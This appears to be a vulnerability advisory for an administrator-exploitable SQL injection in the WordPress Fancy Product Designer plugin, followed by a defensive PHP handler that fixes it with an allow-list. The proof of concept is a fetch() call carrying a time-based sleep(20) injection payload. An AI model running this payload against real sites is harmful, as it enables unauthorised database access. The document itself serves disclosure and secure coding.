Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by administrators.
- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source and note down the associated nonce
- Run the following fetch() command in your browser's console, replacing $NONCE with the nonce:
```javascript
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))
```
Notice that the server takes approximately 20 seconds to answer, confirming that the injected SQL statement was executed.
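The root cause described above is an identifier (a sort column and direction taken from `filter_by` and `sort_by`) concatenated straight into an ORDER BY clause; the nonce only limits who can trigger the request, it does not make the query safe. As an added example that is not the plugin's own code, the WordPress AJAX handler below accepts the same kind of parameters and builds the query safely. The action name `example_get_products`, the capability check, the column list and the page size are assumptions made for the illustration.

```php
<?php
// Added example (not the plugin's code): a WordPress AJAX handler that takes a
// sort column and direction from the request without letting them reach SQL.
// Column names cannot be bound with $wpdb->prepare(), so they are mapped through
// an allow-list; only values (post_type, LIMIT, OFFSET) are bound as placeholders.

add_action( 'wp_ajax_example_get_products', 'example_get_products' );

function example_get_products() {
    // Nonce check defends against CSRF only; it is not an input-sanitisation step.
    check_ajax_referer( 'example_get_products' );

    // Authorisation: capability name is an assumption for this example.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    global $wpdb;

    // Allow-list: request value => real column name. Anything else falls back to ID.
    $columns = array(
        'ID'    => 'ID',
        'title' => 'post_title',
        'date'  => 'post_date',
    );
    $requested = isset( $_GET['filter_by'] )
        ? sanitize_text_field( wp_unslash( $_GET['filter_by'] ) )
        : 'ID';
    $order_by = isset( $columns[ $requested ] ) ? $columns[ $requested ] : 'ID';

    // Direction: anything other than DESC becomes ASC.
    $requested_dir = isset( $_GET['sort_by'] )
        ? strtoupper( sanitize_text_field( wp_unslash( $_GET['sort_by'] ) ) )
        : 'ASC';
    $order_dir = ( 'DESC' === $requested_dir ) ? 'DESC' : 'ASC';

    // Pagination values are coerced to integers and bound with %d.
    $page     = max( 1, absint( $_GET['page'] ?? 1 ) );
    $per_page = 20; // assumed page size
    $offset   = ( $page - 1 ) * $per_page;

    // $order_by and $order_dir can only hold allow-listed literals at this point.
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_type = %s AND post_status = %s
         ORDER BY {$order_by} {$order_dir}
         LIMIT %d OFFSET %d",
        'product',
        'publish',
        $per_page,
        $offset
    );

    wp_send_json_success( $wpdb->get_results( $sql ) );
}
```

With this shape, a request carrying `filter_by=ID,(select*from(select(sleep(20)))a)` simply fails the allow-list lookup and sorts by `ID`; the injected text never reaches the database. The same pattern applies to any place where a request parameter selects a table, column or sort direction: prepare the values, allow-list the identifiers.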